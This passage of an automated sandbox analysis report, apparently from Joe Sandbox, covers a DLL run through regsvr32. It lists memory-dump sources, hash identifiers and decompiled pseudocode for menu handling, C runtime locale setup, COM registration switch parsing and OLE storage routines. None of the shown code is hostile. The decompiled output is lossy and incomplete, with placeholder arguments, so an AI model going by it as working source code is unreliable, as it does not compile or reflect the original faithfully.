                                                                                                                0x10038bed
                                                                                                                0x10038bee
                                                                                                                0x10038bf3
                                                                                                                0x10038b7c
                                                                                                                0x10038c1e
                                                                                                                0x10038c1f
                                                                                                                0x10038c2a
                                                                                                                0x10038c32
                                                                                                                0x10038c35
                                                                                                                0x10038a22
                                                                                                                0x10038a28
                                                                                                                0x10038a4d
                                                                                                                0x10038a4d
                                                                                                                0x10038a4f
                                                                                                                0x10038a51
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10038a40
                                                                                                                0x10038a42
                                                                                                                0x10038a4b
                                                                                                                0x00000000
                                                                                                                0x10038a4b
                                                                                                                0x00000000
                                                                                                                0x10038a42
                                                                                                                0x10038a59
                                                                                                                0x10038a5b
                                                                                                                0x10038a5f
                                                                                                                0x00000000
                                                                                                                0x10038a61
                                                                                                                0x10038a64
                                                                                                                0x00000000
                                                                                                                0x10038a64
                                                                                                                0x10038a2a
                                                                                                                0x10038a2a
                                                                                                                0x10038a2a
                                                                                                                0x10038a2d
                                                                                                                0x10038a30
                                                                                                                0x10038a36
                                                                                                                0x10038a36
                                                                                                                0x10038a28
                                                                                                                0x10038c40
                                                                                                                0x10038c48
                                                                                                                0x10038c49
                                                                                                                0x10038c4a
                                                                                                                0x10038c5f

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __mbsinc$__splitpath_s$H_prolog3__makepath_s_strcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 545433585-0
                                                                                                                • Opcode ID: 5137689b18e690f37eae60b53203d840e3057c809600e4c49a2b3d76fefc51e7
                                                                                                                • Instruction ID: aaf9fa8b0fb168039b66f9d1cc1dd36aef11b215f2cae815bf9e09dd0da92980
                                                                                                                • Opcode Fuzzy Hash: 5137689b18e690f37eae60b53203d840e3057c809600e4c49a2b3d76fefc51e7
                                                                                                                • Instruction Fuzzy Hash: 2381B0B68006499FEB12DBA4CC81FEE77F8EF04314F140199F655AB282D734AB44CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000B587 Relevance: 15.2, APIs: 10, Instructions: 157windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E1000B587(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t88;
				struct HMENU__* _t93;
				int _t94;
				struct HMENU__* _t102;
				int _t107;
				CHAR* _t113;
				signed int* _t118;
				void* _t124;
				signed char _t125;
				struct HMENU__* _t126;
				int _t127;
				signed int _t138;
				signed int* _t141;
				char _t143;
				void* _t144;
				void* _t147;
				CHAR* _t149;
				void* _t151;

				_t149 = _t151 - 0xfc;
				_t88 =  *0x100b9e70; // 0xbb35530
				_t149[0x100] = _t88 ^ _t149;
				_push(0x2c);
				E1004764D(0x1008de1d, __ebx, __edi, __esi);
				_t143 = _t149[0x114];
				 *(_t149 - 0x2c) = _t149[0x10c];
				_t93 = _t149[0x110];
				 *(_t149 - 0x24) = _t93;
				 *((intOrPtr*)(_t149 - 0x34)) = 0;
				 *(_t149 - 0x30) = 0;
				_t94 = GetMenuItemCount(_t93);
				 *(_t149 - 0x38) = _t94;
				 *(_t149 - 0x14) = 0;
				 *(_t149 - 0x10) = 0;
				if(_t149[0x118] == 1) {
					 *(_t149 - 0x10) =  *_t143;
				}
				 *(_t149 - 0x18) = 0;
				if(_t94 <= 0) {
					L25:
					 *(_t143 + _t149[0x118] * 4) =  *(_t149 - 0x14);
					L26:
					 *[fs:0x0] =  *((intOrPtr*)(_t149 - 0xc));
					_pop(_t144);
					_pop(_t147);
					_pop(_t124);
					return E1004763E( *(_t149 - 0x30), _t124, _t149[0x100] ^ _t149, _t141, _t144, _t147);
				}
				do {
					 *(_t149 - 0x1c) = GetSubMenu( *(_t149 - 0x24),  *(_t149 - 0x18));
					_t125 = GetMenuState( *(_t149 - 0x24),  *(_t149 - 0x18), 0x400);
					if( *(_t149 - 0x1c) != 0 || (_t125 & 0x00000800) == 0) {
						__eflags = _t149[0x11c];
						 *(_t149 - 0x28) = 0;
						if(_t149[0x11c] != 0) {
							__eflags = _t149[0x118] - 5;
							if(_t149[0x118] == 5) {
								__eflags =  *((intOrPtr*)(_t143 + 0x14)) - 1;
								if( *((intOrPtr*)(_t143 + 0x14)) == 1) {
									 *(_t149 - 0x28) = GetSubMenu( *(_t149 - 0x2c),  *(_t149 - 0x10));
								}
							}
						}
						_t102 = GetMenuStringA( *(_t149 - 0x24),  *(_t149 - 0x18), _t149, 0x100, 0x400);
						__eflags =  *(_t149 - 0x1c);
						if( *(_t149 - 0x1c) == 0) {
							__eflags = _t102;
							if(_t102 <= 0) {
								goto L23;
							}
							_push(_t149);
							_push(GetMenuItemID( *(_t149 - 0x24),  *(_t149 - 0x18)));
							_t126 = _t125 | 0x00000400;
							__eflags = _t126;
							_push(_t126);
							goto L22;
						} else {
							__eflags =  *(_t149 - 0x28);
							if(__eflags == 0) {
								_t107 = GetMenuItemCount( *(_t149 - 0x1c));
								__eflags = _t107;
								if(_t107 == 0) {
									goto L23;
								}
								_push(_t149);
								_push( *(_t149 - 0x1c));
								_push(_t125 & 0x000000ff | 0x00000410);
								L22:
								InsertMenuA( *(_t149 - 0x2c),  *(_t149 - 0x10), ??, ??, ??);
								 *(_t149 - 0x10) =  *(_t149 - 0x10) + 1;
								_t74 = _t149 - 0x14;
								 *_t74 =  *(_t149 - 0x14) + 1;
								__eflags =  *_t74;
								goto L23;
							}
							_push( *((intOrPtr*)(E1001E302(_t125, _t143, 0x400, __eflags) + 0x10)));
							E1000B543(_t125, _t149 - 0x20, _t143, 0x400, __eflags);
							_t113 =  *(_t149 - 0x20);
							 *(_t149 - 4) =  *(_t149 - 4) & 0x00000000;
							__eflags =  *(_t113 - 0xc);
							if( *(_t113 - 0xc) != 0) {
								L1000AF0C(_t149 - 0x20, 0x20);
							}
							E1000B029(_t149 - 0x20, _t149);
							_t127 =  *(_t149 - 0x1c);
							AppendMenuA( *(_t149 - 0x28), 0x10, _t127,  *(_t149 - 0x20));
							 *(_t149 - 4) =  *(_t149 - 4) | 0xffffffff;
							_t118 = _t143 + _t149[0x118] * 4;
							 *_t118 =  *_t118 & 0x00000000;
							 *((intOrPtr*)(_t118 - 4)) =  *((intOrPtr*)(_t118 - 4)) + 1;
							 *((intOrPtr*)(_t149 - 0x34)) = 1;
							 *(_t149 - 0x30) = _t127;
							L100013E3( &(( *(_t149 - 0x20))[0xfffffffffffffff0]), _t141);
							goto L23;
						}
					} else {
						_t138 = _t149[0x118];
						_t141 = _t143 + _t138 * 4;
						 *_t141 =  *(_t149 - 0x14);
						 *(_t149 - 0x14) = 0;
						if(_t138 < 5) {
							 *(_t149 - 0x10) =  *(_t149 - 0x10) + _t141[1];
						}
						_t149[0x118] = _t149[0x118] + 2;
					}
					L23:
					 *(_t149 - 0x18) =  *(_t149 - 0x18) + 1;
				} while ( *(_t149 - 0x18) <  *(_t149 - 0x38));
				if( *((intOrPtr*)(_t149 - 0x34)) != 0) {
					goto L26;
				}
				goto L25;
			}






















                                                                                                                0x1000b58e
                                                                                                                0x1000b592
                                                                                                                0x1000b599
                                                                                                                0x1000b59f
                                                                                                                0x1000b5a6
                                                                                                                0x1000b5b1
                                                                                                                0x1000b5b7
                                                                                                                0x1000b5ba
                                                                                                                0x1000b5c3
                                                                                                                0x1000b5c6
                                                                                                                0x1000b5c9
                                                                                                                0x1000b5cc
                                                                                                                0x1000b5d9
                                                                                                                0x1000b5dc
                                                                                                                0x1000b5df
                                                                                                                0x1000b5e2
                                                                                                                0x1000b5e6
                                                                                                                0x1000b5e6
                                                                                                                0x1000b5eb
                                                                                                                0x1000b5ee
                                                                                                                0x1000b769
                                                                                                                0x1000b772
                                                                                                                0x1000b775
                                                                                                                0x1000b77b
                                                                                                                0x1000b783
                                                                                                                0x1000b784
                                                                                                                0x1000b785
                                                                                                                0x1000b79a
                                                                                                                0x1000b79a
                                                                                                                0x1000b5f9
                                                                                                                0x1000b609
                                                                                                                0x1000b615
                                                                                                                0x1000b61c
                                                                                                                0x1000b64d
                                                                                                                0x1000b653
                                                                                                                0x1000b656
                                                                                                                0x1000b658
                                                                                                                0x1000b65f
                                                                                                                0x1000b661
                                                                                                                0x1000b665
                                                                                                                0x1000b673
                                                                                                                0x1000b673
                                                                                                                0x1000b665
                                                                                                                0x1000b65f
                                                                                                                0x1000b686
                                                                                                                0x1000b68c
                                                                                                                0x1000b690
                                                                                                                0x1000b72a
                                                                                                                0x1000b72c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000b731
                                                                                                                0x1000b73e
                                                                                                                0x1000b73f
                                                                                                                0x1000b73f
                                                                                                                0x1000b741
                                                                                                                0x00000000
                                                                                                                0x1000b696
                                                                                                                0x1000b696
                                                                                                                0x1000b69a
                                                                                                                0x1000b70e
                                                                                                                0x1000b714
                                                                                                                0x1000b716
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000b71b
                                                                                                                0x1000b71c
                                                                                                                0x1000b727
                                                                                                                0x1000b742
                                                                                                                0x1000b748
                                                                                                                0x1000b74e
                                                                                                                0x1000b751
                                                                                                                0x1000b751
                                                                                                                0x1000b751
                                                                                                                0x00000000
                                                                                                                0x1000b751
                                                                                                                0x1000b6a1
                                                                                                                0x1000b6a7
                                                                                                                0x1000b6ac
                                                                                                                0x1000b6af
                                                                                                                0x1000b6b3
                                                                                                                0x1000b6b7
                                                                                                                0x1000b6be
                                                                                                                0x1000b6be
                                                                                                                0x1000b6ca
                                                                                                                0x1000b6d2
                                                                                                                0x1000b6db
                                                                                                                0x1000b6ea
                                                                                                                0x1000b6ee
                                                                                                                0x1000b6f1
                                                                                                                0x1000b6f4
                                                                                                                0x1000b6fa
                                                                                                                0x1000b701
                                                                                                                0x1000b704
                                                                                                                0x00000000
                                                                                                                0x1000b704
                                                                                                                0x1000b625
                                                                                                                0x1000b625
                                                                                                                0x1000b631
                                                                                                                0x1000b634
                                                                                                                0x1000b636
                                                                                                                0x1000b639
                                                                                                                0x1000b63e
                                                                                                                0x1000b63e
                                                                                                                0x1000b641
                                                                                                                0x1000b641
                                                                                                                0x1000b754
                                                                                                                0x1000b754
                                                                                                                0x1000b75a
                                                                                                                0x1000b767
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000B5A6
                                                                                                                • GetMenuItemCount.USER32(?), ref: 1000B5CC
                                                                                                                • GetSubMenu.USER32 ref: 1000B5FF
                                                                                                                • GetMenuState.USER32(?,?,00000400), ref: 1000B60F
                                                                                                                • GetSubMenu.USER32 ref: 1000B66D
                                                                                                                • GetMenuStringA.USER32 ref: 1000B686
                                                                                                                • AppendMenuA.USER32(00000000,00000010,00000000,?), ref: 1000B6DB
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 1000B70E
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 1000B738
                                                                                                                • InsertMenuA.USER32(?,?,00000000,00000000), ref: 1000B748
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$Count$AppendH_prolog3InsertStateString
                                                                                                                • String ID:
                                                                                                                • API String ID: 915444591-0
                                                                                                                • Opcode ID: a4eef6a3f4376d49903b0779fc6422aee06ceab9011746bed295798fb85076cb
                                                                                                                • Instruction ID: 3f5d256e697bb0ece931bc901f8766a9fbca0fe627d54b4ac24e569dd544017d
                                                                                                                • Opcode Fuzzy Hash: a4eef6a3f4376d49903b0779fc6422aee06ceab9011746bed295798fb85076cb
                                                                                                                • Instruction Fuzzy Hash: DE615870D00619EFEF11CFA4CD85AEDBBB5FF08395F10402AE915A62A0D7756A94CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100593ED Relevance: 15.1, APIs: 10, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E100593ED(void* __ebx, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				intOrPtr _t13;
				intOrPtr _t14;
				void* _t43;
				intOrPtr* _t51;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t51 = E1005496F(8, 1);
					_t58 = _t51;
					if(_t51 != 0) {
						_t13 = E1005496F(0xd8, 1);
						 *_t51 = _t13;
						__eflags = _t13;
						if(__eflags != 0) {
							_t14 = E1005496F(0x220, 1);
							__eflags = _t14;
							 *((intOrPtr*)(_t51 + 4)) = _t14;
							if(__eflags != 0) {
								E10058756( *_t51, 0x100bab30);
								_push(_a4);
								_t48 =  *_t51;
								__eflags = E1005921F(_a8,  *_t51);
								_pop(_t43);
								if(__eflags != 0) {
									__eflags = E10058159(_t43, _t48, __eflags,  *((intOrPtr*)( *_t51 + 4)),  *((intOrPtr*)(_t51 + 4)));
									if(__eflags == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
										L17:
										return _t51;
									}
									_push( *((intOrPtr*)(_t51 + 4)));
									E100470E9(__ebx, 1, _t51, __eflags);
									_push( *_t51);
									E100586CA();
									E10058504( *_t51);
									_push(_t51);
									E100470E9(__ebx, 1, _t51, __eflags);
									L15:
									_t51 = 0;
									goto L17;
								}
								_push( *_t51);
								E100586CA();
								E10058504( *_t51);
								_push(_t51);
								E100470E9(__ebx, 1, _t51, __eflags);
								goto L15;
							}
							_push( *_t51);
							E100470E9(__ebx, 1, _t51, __eflags);
							_push(_t51);
							E100470E9(__ebx, 1, _t51, __eflags);
							L8:
							goto L3;
						}
						_push(_t51);
						E100470E9(__ebx, 1, _t51, __eflags);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E10049097(_t58))) = 0xc;
					goto L4;
				}
			}









                                                                                                                0x100593f4
                                                                                                                0x1005941b
                                                                                                                0x00000000
                                                                                                                0x100593fd
                                                                                                                0x10059408
                                                                                                                0x1005940a
                                                                                                                0x1005940e
                                                                                                                0x10059426
                                                                                                                0x1005942d
                                                                                                                0x1005942f
                                                                                                                0x10059431
                                                                                                                0x10059442
                                                                                                                0x10059447
                                                                                                                0x1005944b
                                                                                                                0x1005944e
                                                                                                                0x10059467
                                                                                                                0x1005946c
                                                                                                                0x10059474
                                                                                                                0x1005947b
                                                                                                                0x1005947d
                                                                                                                0x1005947e
                                                                                                                0x100594a6
                                                                                                                0x100594aa
                                                                                                                0x100594d2
                                                                                                                0x100594d7
                                                                                                                0x100594d9
                                                                                                                0x00000000
                                                                                                                0x100594d9
                                                                                                                0x100594ac
                                                                                                                0x100594af
                                                                                                                0x100594b4
                                                                                                                0x100594b6
                                                                                                                0x100594bd
                                                                                                                0x100594c2
                                                                                                                0x100594c3
                                                                                                                0x100594cb
                                                                                                                0x100594cb
                                                                                                                0x00000000
                                                                                                                0x100594cb
                                                                                                                0x10059480
                                                                                                                0x10059482
                                                                                                                0x10059489
                                                                                                                0x1005948e
                                                                                                                0x1005948f
                                                                                                                0x00000000
                                                                                                                0x10059494
                                                                                                                0x10059450
                                                                                                                0x10059452
                                                                                                                0x10059457
                                                                                                                0x10059458
                                                                                                                0x10059439
                                                                                                                0x00000000
                                                                                                                0x10059439
                                                                                                                0x10059433
                                                                                                                0x10059434
                                                                                                                0x00000000
                                                                                                                0x10059434
                                                                                                                0x10059410
                                                                                                                0x10059415
                                                                                                                0x00000000
                                                                                                                0x10059415

                                                                                                                APIs
                                                                                                                • __calloc_crt.LIBCMT ref: 10059403
                                                                                                                  • Part of subcall function 1005496F: __calloc_impl.LIBCMT ref: 1005497D
                                                                                                                  • Part of subcall function 1005496F: Sleep.KERNEL32(00000000), ref: 10054994
                                                                                                                • __calloc_crt.LIBCMT ref: 10059426
                                                                                                                • __calloc_crt.LIBCMT ref: 10059442
                                                                                                                • __copytlocinfo_nolock.LIBCMT ref: 10059467
                                                                                                                • __setlocale_nolock.LIBCMT ref: 10059476
                                                                                                                • ___removelocaleref.LIBCMT ref: 10059482
                                                                                                                • ___freetlocinfo.LIBCMT ref: 10059489
                                                                                                                • __setmbcp_nolock.LIBCMT ref: 100594A1
                                                                                                                • ___removelocaleref.LIBCMT ref: 100594B6
                                                                                                                • ___freetlocinfo.LIBCMT ref: 100594BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2969281212-0
                                                                                                                • Opcode ID: ccc9718630be14401348291a1293bca2cf76700b22a3c32183863ca420a0bef8
                                                                                                                • Instruction ID: 21b092e1abacb6dd10aba6d3a1ef32e7616c8c6965b8e6eac974718d1555045c
                                                                                                                • Opcode Fuzzy Hash: ccc9718630be14401348291a1293bca2cf76700b22a3c32183863ca420a0bef8
                                                                                                                • Instruction Fuzzy Hash: 7621A43D209601EFE721DF24E802D0FB7E4EF82654F21882DF884A2155EF31AC49DB55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100196B7 Relevance: 15.1, APIs: 3, Strings: 7, Instructions: 87stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E100196B7(void* __ecx, CHAR* _a4) {
				int _t11;
				int _t12;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t29;
				void* _t31;
				void* _t33;
				CHAR* _t34;
				void* _t35;

				_t34 = _a4;
				_t35 = __ecx;
				_t11 = lstrcmpA(_t34, "pt");
				if(_t11 == 0) {
					 *((intOrPtr*)(_t35 + 0x10)) = 3;
					return _t11;
				}
				_t12 = lstrcmpA(_t34, "p");
				if(_t12 == 0) {
					 *((intOrPtr*)(_t35 + 0x10)) = 2;
					return _t12;
				}
				_t13 = E1001286D(_t34, "Register");
				if(_t13 == 0) {
					L16:
					 *((intOrPtr*)(_t35 + 0x10)) = 5;
					return _t13;
				}
				_t13 = E1001286D(_t34, "Regserver");
				if(_t13 == 0) {
					goto L16;
				}
				_t14 = E1001286D(_t34, "Unregister");
				if(_t14 == 0) {
					L15:
					 *((intOrPtr*)(_t35 + 0x10)) = 6;
					return _t14;
				}
				_t14 = E1001286D(_t34, "Unregserver");
				_pop(_t29);
				if(_t14 == 0) {
					goto L15;
				}
				if(lstrcmpA(_t34, "dde") == 0) {
					_t19 = E10022019(_t29, _t15);
					 *((intOrPtr*)(_t35 + 0x10)) = 4;
					return _t19;
				}
				_t16 = E1001286D(_t34, "Embedding");
				_pop(_t31);
				if(_t16 == 0) {
					_t18 = E10022019(_t31, _t16);
					 *((intOrPtr*)(_t35 + 8)) = 1;
					L12:
					 *(_t35 + 4) =  *(_t35 + 4) & 0x00000000;
					return _t18;
				}
				_t17 = E1001286D(_t34, "Automation");
				_pop(_t33);
				if(_t17 == 0) {
					_t18 = E10022019(_t33, _t17);
					 *((intOrPtr*)(_t35 + 0xc)) = 1;
					goto L12;
				}
				return _t17;
			}
















                                                                                                                0x100196c0
                                                                                                                0x100196ca
                                                                                                                0x100196cc
                                                                                                                0x100196d0
                                                                                                                0x100196d2
                                                                                                                0x00000000
                                                                                                                0x100196d2
                                                                                                                0x100196e4
                                                                                                                0x100196e8
                                                                                                                0x100196ea
                                                                                                                0x00000000
                                                                                                                0x100196ea
                                                                                                                0x100196fc
                                                                                                                0x10019705
                                                                                                                0x100197aa
                                                                                                                0x100197aa
                                                                                                                0x00000000
                                                                                                                0x100197aa
                                                                                                                0x10019711
                                                                                                                0x1001971a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10019726
                                                                                                                0x1001972f
                                                                                                                0x100197a1
                                                                                                                0x100197a1
                                                                                                                0x00000000
                                                                                                                0x100197a1
                                                                                                                0x10019737
                                                                                                                0x1001973f
                                                                                                                0x10019740
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001974c
                                                                                                                0x1001974f
                                                                                                                0x10019754
                                                                                                                0x00000000
                                                                                                                0x10019754
                                                                                                                0x10019763
                                                                                                                0x1001976b
                                                                                                                0x1001976c
                                                                                                                0x1001976f
                                                                                                                0x10019774
                                                                                                                0x1001977b
                                                                                                                0x1001977b
                                                                                                                0x00000000
                                                                                                                0x1001977b
                                                                                                                0x10019787
                                                                                                                0x1001978f
                                                                                                                0x10019790
                                                                                                                0x10019793
                                                                                                                0x10019798
                                                                                                                0x00000000
                                                                                                                0x10019798
                                                                                                                0x100197b4

                                                                                                                APIs
                                                                                                                • lstrcmpA.KERNEL32(?,1009C800), ref: 100196CC
                                                                                                                • lstrcmpA.KERNEL32(?,1009C7FC), ref: 100196E4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmp
                                                                                                                • String ID: Automation$Embedding$Register$Regserver$Unregister$Unregserver$dde
                                                                                                                • API String ID: 1534048567-1547061805
                                                                                                                • Opcode ID: 60573c7528be058affa71ce0b378e8f877830fb0de34cc76e3df0a0d133389b0
                                                                                                                • Instruction ID: 79a62cdd177f1b5dfa4b217553fad06d89059955d199f48fdbc3c6dc5129af43
                                                                                                                • Opcode Fuzzy Hash: 60573c7528be058affa71ce0b378e8f877830fb0de34cc76e3df0a0d133389b0
                                                                                                                • Instruction Fuzzy Hash: BD21B47641C702AAF624DEF2ACC5F6BA2ECEF41359F20041EF906AA0C1EF75E4D56611
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000A3F7 Relevance: 15.1, APIs: 10, Instructions: 82comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ReadClassStg.OLE32(?,?), ref: 1000A415
                                                                                                                • ReadFmtUserTypeStg.OLE32(?,?,?), ref: 1000A431
                                                                                                                • OleRegGetUserType.OLE32(?,00000001,?), ref: 1000A444
                                                                                                                • WriteClassStg.OLE32(?,?), ref: 1000A45C
                                                                                                                • WriteFmtUserTypeStg.OLE32(?,?,?), ref: 1000A472
                                                                                                                • SetConvertStg.OLE32(?,00000001), ref: 1000A47E
                                                                                                                • WriteClassStg.OLE32(?,?), ref: 1000A490
                                                                                                                • WriteFmtUserTypeStg.OLE32(?,?,?), ref: 1000A499
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1000A4AC
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1000A4B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
